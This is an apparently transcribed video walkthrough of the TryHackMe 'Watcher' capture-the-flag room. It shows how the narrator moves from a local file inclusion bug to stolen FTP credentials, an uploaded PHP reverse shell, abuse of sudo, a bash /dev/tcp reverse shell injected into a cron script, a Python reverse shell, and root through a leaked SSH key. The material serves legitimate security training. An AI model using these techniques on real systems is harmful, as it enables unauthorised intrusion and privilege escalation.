Okay, today I'm going to do the Watcher room in TryHackMe. It's a Linux machine utilising web exploits along with common privilege escalation techniques. And it's a medium one, it's a bit more challenging. You've got to find flag 1, flag 2, flag 3, flag 4, flag 5, flag 6, flag 7 flags you've got to find. So we'll start the machine, wait for an IP. Already connected to the VPN for TryHackMe up here. That's my VPN IP 10.8.98.254. So first I'm going to do is run an nmap scan. And we can also have a look at the flag 1. You can have a look at the hints. It says there's robot.txt, so there's a good chance there's a robot.txt on the website, robot.txt page. It's got 10 seconds. Okay, we've got our IP 10.10.89.104. So I'll copy that to clipboard and we'll go to our terminal and we'll do an nmap -a to scan for all services and service versions, scripts and operating system, and we'll just scan the top ports, and we'll do paste the IP in there, run that, see what we get. It won't take long. Yeah, 4 seconds remaining. It's pretty quick. Okay, so we've got port 21 open, FTP. Port 22 open, SSH. And we've got port 80 open, Apache HTTPD 2.429. And it's running Jekyll version 4.11. The title of the webpage, Cork Placements. It's a Linux machine. Alright, so the FTP's got a 3.03 version. So we'll check out the website first. It's running on port 80, so we've got a HTTP page, Cork placemats. Alright. Have a look at the source code. Doesn't look like there's anything to see there that we can use to find anything. We can close that. We can click on the pictures, stripe.php, round placemats. Have a quick look around. That doesn't do anything. Alright, so we'll do a directory search. So use GoBuster, search for any hidden directories. On that. And we'll put our IP in as 89.104. Run that. So we're running it. We're looking for PHP files, text files, HTML, 50 threads. We're using this word list. Do a buster word list directory list. Dash 2.3 medium.txt. And I'll say we're going to find a robot.txt page because that was the hint. And just wait for a minute. Hopefully we'll find it. We've got post.php. Robot.txt. There we go. So we'll copy that one. And go back to here. And just paste that in there. Control V. And we see we've got user agent allow flag underscore text flag1.txt and allow secret file do not read this text. So let's check out this one. Copy that. Flag. What robots.txt, what is next? Okay, so copy that. That should be our first flag. Submit. Correct. Okay, flag 2. So if we go back here, we've got also got this here. Secret file do not read.txt. So we'll have a look at that. Forbidden. You don't have permission to access this resource. Okay. But I did see if we have a look on the web page, if we click on these, one of these, we see post.php question mark post equals round.php. As you can see in the address bar, it's accessing a different file from a different location. The website might be vulnerable to LFI, local file inclusion. So let's see if we can see any pages. Try. See if we can see the password. And yep. So we can. So it is vulnerable to LFI, local file inclusion. Okay, so what if we want to view that file from before, and that'll be in the var www HTML slash what was it? Secret file do not read.txt. So if we do that, we might be able to read this. And sure enough, hi Matt, the credentials for FTP server are below. I've set the files to be saved to home FTP user FTP files will. So there's our credentials for FTP. We'll look at it. FTP user, give me file 777. Okay, so let's try and log onto an FTP server. Just let that run for a bit. FTP, and what was our IP again? And we want FTP user, and our password was what's the password? Give me files 777. Log on successful. Beautiful. Alright, so we do ls to see any files. And we see we've got flag underscore 2.txt. So if we say get flag underscore 2.txt, and we've transferred it back to our machine. So if we open another terminal, and there it is, flag2.txt. So if we cat that out, and flag F to be you and me. Okay, so we'll copy that. And we'll put that back in here. Very good. Flag 2's done. Okay, flag 3. So what have we got here? Go back to our FTP server. Okay, so we can see that you see the directory, the files directory here is writable to us. So let's upload a reverse shell to this. So let's exit this, and we'll go to CD exploits, clear the screen, and I've already got a reverse shell in there, shell.php. Okay, so if I go back, log back onto a server again, log back on the FTP server, and it was FTP user, give me files 77, okay, back in again. Now if we change to the files directory, okay, so we can upload our reverse shell by doing send and the name of the reverse shell, and transfer is complete. If we do ls now, we've got a reverse shell on there. Okay, so we should be able to exit out of there now. Go back to our website. Instead of this, we put in this directory where our files are. Oops, that's no good. Copy that. Control V in there, and we're going to shell.php. That's our file. That's our reverse shell. And we have to have a look and see what, before we run that, we're going to have a look at if we cut out our shell.php, have a look at it, we can see it's been set with our VPN IP already. That's good to go, and port quadruple 4. So clear that again, and let's start a listener on 444. That's listening and ready to go. Alright, so now if we hit enter, we should have a reverse shell onto our machine, and yes, look at that, we're in. Okay, so now we can stabilize the shell by doing Python 3 -c, import pty dot spawn a bin bash. Yep, those brackets. That looks good. Okay, now it's stabilized. And we can also do export equals xterm. That'll give us, I'll be able to clear the screen and everything. Yep. Righto, so let's do ls. We're in that directory. So let's go cd to home. ls. So we've got FTP user, Matt, Toby and Will. They're the users on the machine. So let's try, what are we looking for? Flag 3. So to search for flag 3, we'll do find, and we want type file, dash name, and we want flag underscore 3 dot text, and see what we can find. Didn't find anything in there. Oh, okay. We've got to find that first. Now type f dash name flag underscore 3 text. Let's have a look now. What have we got? It's still searching. Oh, here we go. Look, var ww html more secrets flag 3.text. So let's copy that. And cd into there. Okay, if we do ls now, we see we've got flag 3.text. So we cut that. Okay, there's our flag. So copy that. And we'll put that in here. Okay, now we've got to find flag 4. So let's have a look back in our, clear the screen again. We'll go back to home, ls. Alright, so let's do cd into Toby. Have a look in there, ls, and there's flag 4.text. Alright, so let's see if we can see that. Permission denied. Okay, so we're going to have to escalate our privileges to Toby. So what if we we'll do a sudo-l, see what sudo permissions we have. And we see user www data may run the following commands on watcher Toby no password. Oh. So it looks like we can run anything with sudo as Toby user without using any Toby's password. So let's access the bash using sudo. So if we do sudo -u and Toby, and then bash. Ah, there we go, we've changed to user Toby now. We say who am I? And we're Toby. So now we should be able to cat that flag because we're user Toby now. Yep, there you go, flag, Chad lifestyle. So we'll copy that. And we'll paste that one in there. Correct. Okay, there's only 3 more to find. Flag 5. So what else have we got in this directory? Let's clear that. We've got note.txt, so have a look at that. No, cat note.txt. Okay, hi Toby, I've got a cron job set up now, so you don't need to worry about getting that done. Okay, so if we cd into jobs, see what's in there. You see we've got cow.sh. Okay, so if we view that, we've got a bin bash, copy home mat cow jpeg to temp cow.jpg. So what's the next step? We need to so we need escalator privileges again to find the next flag. See what permissions we got on that file. And right, we have read, write, and execute privileges on cow.sh. That's good. So now, if we've got to get a reverse shell. So we go to this, go to online reverse shells, and we'll use the use bash reverse shell. It's on 4702 and it's got our IP already in there, which is this VPN IP. So if we copy that one, and we're going to do so if we echo, we want to add that to that file, to the cow. We want to add this reverse shell to that cow.sh file. So we're going to do we're going to do bash -c we'll do bash -i. This is our reverse shell. And deb TCP, and then our IP 10.8.98.254, which is the one up here, and then we want is 4702 is our port, and then we want to do 0 greater than and 1. Do inverted commas again. Do that. Now we want to add it to the file, so we do 2 of those, and we'll put cow.sh. So that should have added it to that file now. So if we do cat cow.sh, we can see we've got our bin bash, copy home map cow.jpg, and we've got a reverse shell in there, ready to go. Okay, so it's just a matter of start another listener, on 4702, which is a port. Let's check that. Yeah, 4702. Now, if we wait, it's a cron job, so we should get a connection here very soon. Once the cron job runs, we should get a connection. Is it 4702? Yep. Shouldn't be too long, maybe in a minute. And there we go, we're Matt now, user Matt. We're connected. Who am I? We're Matt. Beautiful. So we've escalated our privilege to Matt now. So if we have a look back here, we can close that. We're looking for flag 5 now. So if we do ls, and sure enough, there it is. And cat flag underscore 5 dot text. And there it is, flag, live by the cow, die by the cow. Cool. Copy that one. To here. Okay, flag 6, we've got to find now. So, clear the screen again. Oh, term's not set, so we need to set export term. Equals x term. Get our term environment variable set. Now we should be able to clear the screen. ls again. So let's have a look at note.txt. Hi Matt, I've set you up your sudo rights to use the Python script as my user. You can only run the script with sudo, so it should be safe. Alright, so let's have a look at scripts. Okay, so we've got command.py, so we've got 2 Python scripts there. We'll clear the screen again. So let's have a look and see which one if we can write to them. So we can write to command.py and willscript.py. So let's have a look at command.py. Okay, so we've got a so we can have a look at the other one. Okay, so we can see if we run willscript.py with 1 or 2 or 3 parameters, then it checks command.py. If we run wills_script py1, then we'll get LSLA. So every time we run Will's script, it calls command.py to run system commands. So yeah, it can run commands like ect password. So we can edit and modify the command.py. If we add a Python one-liner reverse shell to command.py, we'll get a reverse shell. Alright, so let's see if we can get the reverse shell. So if we go get a one-liner from this website. Payload of all things. There's a GitHub page. And we'll have a look at Python. There we go, Python. We want to use this one here. So we'll copy this. Actually, just copy it there. Alright, so open a new terminal. And we'll just nano file so we can get a file set up. So we want to do echo, and then we want to paste in our reverse shell. That's not it. Okay, that's better. So we want to echo that. Alright, and we want to change the IP to our VPN one, 8.98.254, and we're going to use 4242 this time, different port. We don't need the Python in there, we can get rid of that. So just echo and import that. Okay, so, and we also want to put that in the command.py file. So we go right over here, and we want to command.py. Should be good. Alright, so we'll exit, save that. Now if we cap that, there's our command. So now we can copy that back in here. No, this one. Okay, so we paste that in there. Yep. Now we want to start a listener. And it was on 4242. So we do a netcat port 4242. That's listening and waiting for our connection. Now all we've got to do is, if we do sudo -l again, so we want to run it as will, you will, and we want to copy this, paste that in there, and we want to run the parameter 1. Now we should have a connection. No, look at that. Who am I now? We're Will. Let's go to privileges to Will now. So ls, no, it's not in there. So if we go cd home, ls, change the will, ls, and there's flag 6. So we cut that out. And there we go, flag, but I thought my script was secure. Nope, it's not. So copy that one. And we'll put that in there. Okay, any one more to go, flag 7. So what else have we got to do now? We've got to try and get to root now. Root privileges. So let's have a look in some of these backup folders in the opt directory. So if we try cd opt ls backups, and we go into there. Okay, we've got key.b64. So let's cat that, see what we got. B64. So I'd say it's because it's B64, I'd say it's base 64 encoded. So let's have a look. Yep, sure enough. So if we copy that, and we'll go to our Cyber Chef, which is a really good program to decode and encode things. And go to Cyber Chef. Wait for that to load. Okay, so now we'll paste that in here. And we're going to use the recipe over here from base 64. And we've got a private key. So let's copy that. The RSA private key. Alright, so let's start a new terminal. So now if we do nano key dot text, we'll paste that in there. No, we don't want to paste that in there actually. Control X. No. Try again. I want to paste that clipboard. There we go, private key in there now. Okay, now we'll save that. Key.text. So now we've just got to SSH into the machine. Because we've got an SSH private key. So dash I. And we've got key.text already in there from before. So put our IP in there, which was 10.10. What was it? 89.104. And say yes. Root password. Okay. And we can't get in because we haven't got the right permissions. And we don't know the root password. So we need to change the key.text permissions. Because if we do ls-la, where's key.text? So we haven't got execute permissions. So we need to change that. So we'll do chmod. Just change the permissions. We'll do 600 key.text and do ls-la key.text. So we got read and write. We must have had too many permissions. Okay, so you just only should have that permission for it to work. Alright, so now if we go back to our SSH, now we should be able to get in. And look, we're root. Who am I? Root. Okay, we own this machine now. So if we do cd into root, ls, flag 7. So cat flag underscore 7 dot text. The flag, who watches the watches? Copy that. And we'll paste that in there. Submitted. Congratulations, you completed the room. It's watcher done. Woohoo! 100% complete. That was a challenging one. Stop the machine. Alright, see you next time. Happy hacking.